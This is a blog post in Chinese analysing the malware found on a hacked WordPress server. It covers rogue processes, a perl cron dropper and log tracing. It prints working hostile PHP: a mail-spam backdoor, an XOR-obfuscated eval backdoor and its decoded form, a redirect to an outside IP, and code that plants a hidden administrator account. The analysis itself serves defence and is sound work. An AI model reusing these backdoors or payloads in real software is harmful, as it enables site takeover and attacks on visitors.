分析被駭主機的惡意程式

主機環境

PHP Version 7.0.11
disable_functions exec,passthru,proc_open,shell_exec,system,popen,dl
crontabs-1.10-33.el6.noarch
Linux cross.dev 2.6.32-754.14.2.el6.x86_64 #1 SMP Tue May 14 19:35:42 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
CentOS release 6.6 (Final)
Server version: Apache/2.2.15 (Unix)
plesk version Product version: 12.0.18 Update #101

查看到惡意程序

apache 38715 0.3 0.2 1958144 69272 ? Ss 09:31 0:00 sid -DFOREGROUND
apache 45368 7.8 0.0 139672  8804  ? Ss 14:50 7:51 selix
apache 50910 0.3 0.0 138192  5480  ? Ss 16:26 0:00 selix

當下可以用 strace 或 lsof 追蹤惡意程序在作什麼事情

strace -p pid
lsof -p pid

根據惡意程序的建立(產生) 的時間 (09:31 ) 去反查 access_log access_ssl_log 記錄

查到可能的記錄 GET //wp-content/themes/news-box-lite/httpd.pl

也有很多 POST /wp-content/themes/news-box-lite/ocqwjyrrl.php (也有一堆 POST /xmlrpc.php)

news-box-lite 裡有一推亂數的 php 檔,像 ocqwjyrrl.php

內容都是

<?php 
$jewrqwbnlk = base64_decode($_POST['ylxqjqbcn']); 
$xaouf = base64_decode($_POST['nrsf']); 
$jwgpxlzblkepa = base64_decode($_POST['tdluhqtnmzr']);  
$fcublsqtpae = base64_decode($_POST['qqifquaqdzvp']);  
$jfnbrsjfq = mail($jewrqwbnlk, $xaouf, $jwgpxlzblkepa , $fcublsqtpae);
if($jfnbrsjfq){echo 'vwkxlpc';} else {echo 'yfbhn : ' . $jfnbrsjfq;} 

也就是它們都是透過 wordpress 進來的 (檔案是 apache id 或 user id 權限)

惡意程序是用 apache 使用者執行的,但它們不是 httpd 程式,所以隨機產生了 pid 或 sid 或 selix 程序名稱

它們會去對外連線 25 port 及 53 port,可能在攻擊 smtp 、dns、或亂發信

並在 /var/spool/cron/apache 排程了 */10 * * * * perl /var/tmp/obNAwDiLPa >/dev/null 2>&1

/var/spool/cron/apache 當下是 apache:apache 權限,我把它改成 chown root:root、chmod 400 了並刪除 perl 排程,還是被成功改成 apache:apache (也排程了) (可能攻破了某核心部份)

可能由 GET /wp-content/themes/news-box-lite/httpd.pl 產生這些過程的 (排程、apache 惡意程序),但這支 httpd.pl 已被刪,無法得知內容

一堆惡意程式其中一個

<?php $ZrbHHby='::H1 E5UHT0=. -'; $ISrLPIE='YH-PT j3=:SIGOC'^$ZrbHHby; $PcifgM='0Vme,6;69TU9e+.S1G6ymAT>2W979sn=,5wLXAECa, ,.,iaTlO=Ks1U;cg0RdR:XCL=RblZS qeSzonq3RXKEPGF>O kyibDXJfmb=4I7xJBXJ9BVi=SJ5=+m-SYHPtWAAXWuhp-<;=SHXlfls:HboLM>M2JbtjQ=P.64SLg-BMpCe..7 bdmrO 9,RB6 =H-lX594UWY k2WOZeU6DWbvgQ0X;IEQHYO8JJkRA+456b.=:hmzaYTkH1M8Vtwid0B SJ69 36W9ZG;=pr< NMXmu0-N+xWwWsGA=sRMU2I-nE,1IlokZdWkuZ TvreROqb -Dpq0u5kHreUetqnUobQ+dzdpgNJ09,KrZY>a X-:;EjBD9K+ A3mxcqPJ 7aEAPbyqG=MlW8,VMwJ =5lw5 B  6 m>OY>fP6 8bjear0xHH CM< vPM7aku4mploq3hd8exm3zx4bqkEXAno'; $mFDvwn=$ISrLPIE('', 'Y0EDJCUUM=:W:NV:B3EQJ9;Lm3XCX,1PYAPeqa>IhJUR65QYNK=RR8+A,753U-IIiSTEJGZUP3OSRORHd.pksP;;6WwPVaZs:eH-7qB:TEIgaHuSP:<N.7RyJJS< AtRV MJK>kkE ,MptVUBqZMZM2E=1ockWZ0B8CYrArI,1 X<JH16YX8zAegxA7,>7>obQ:TBBck9R7lgFYU=VXwb>+U13R7w.TIJ2F6 hmT1 -+2NbzKSIX2+0LNH,ys:z.7HAGRT2E TUuWF.P>C+KGOxpST6O7=XX3XSSbRX.JaaT1;5RqIYaG-4E.Te1gyTFYPwOH.D8EmOOjF<1 2P,OPM4nuc1 61X,Hau1EYwrDCA:A ;+CIAfN<m6QLP6KV.NNUu,,GshfEiZ,F+BIJuK1BCQhFnPH0zIAJOCABYM2:NJI +WLT2HD ZKk16-A4m::.M7W72TB85U;T- yl=.L+cGreOUAW=EXCADAk02ClU,L7TQODQ0R23iREJi2A34ONXUWE7jtMQTL:JQwQqSo,YFzi1S=L5bGT0K2BzYjKR9FmBFTd-BVFOtEBQGWSqAQbRCGX3XQhJCSDVAn+BKM2-1E DIO6Be4X2GO WJTCU4+TVHlapBYQgFGe2NM:eS.AIT7PEA;LOWDJcfb4o5NILJZLZxMr-+H,eQDCx STCQk>5>94a3Fp1,=l27g6S6lqhUe'^$PcifgM); $mFDvwn();

單單它的 $mFDvwn = $ISrLPIE(”, XXX); $mFDvwn(); 是怎麼讓程式執行,感覺看起來只是 echo string,
但其實它靠這個 ^ 去建立 create_function (https://www.php.net/manual/en/function.create-function.php) (^ 的說明 https://www.php.net/manual/en/language.operators.bitwise.php)
到 https://www.unphp.net/decode/5913a97d362273e62447aa6654ab3071/ 解開

<?php if (!function_exists('xor_data__mut')) {
    function xor_data__mut($data, $key) {
        $out = '';
        for ($i = 0;$i < strlen($data);$i++) $out.= ($data[$i] ^ $key[$i % strlen($key) ]); return ($out); } } $data = false; $data_key = false; foreach ($_COOKIE as $key => $value) {
    $data_key = $key;
    $data = $value;
}
if (!$data) {
    foreach ($_REQUEST as $key => $value) {
        $data_key = $key;
        $data = $value;
    }
}
$data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
if ($data && array_key_exists('key', $data) && (md5($data['key']) == 'cf94416b34fb053a2b893477766f739a') && array_key_exists('payload', $data)) {
    eval($data['payload']);
    exit(0);
}
echo (md5(md5($_SERVER["HTTP_HOST"])));

create_function 一個範例

create_function('$name', 'echo "Hello ".$name');

類似於

function fname($name) {
    echo "Hello ".$name;
}

還有一檔 wp-data.php,裡面有一些 base64 編碼過的,它在作那些事 ↓

1。掃目錄 www、httpdocs 或 public_html 等等
2。弄 htaccess
m^r^<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
    
3。導到別的地方
m^r^<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$c1=strlen($c0);$c2="";for($c3=0;$c3<$c_;$c3++){$c2.=$c0[rand(0,$c1-1)];}return$c2;}$c4=array("Chrome","Firefox","Edge","Opera","Android","Safari","Windows");foreach($c4 as$c5){if(stripos($_SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600*24*2);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a_());}}};?>

4。建 wordpress 使用者
m^r^<?php $createuser = wp_create_user('wordcamp', 'z43218765z', 'wordcamp@wordpress.com'); $user_created = new WP_User($createuser); $user_created -> set_role('administrator'); ?>

 

最後修改日期: 2019 年 11 月 18 日

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。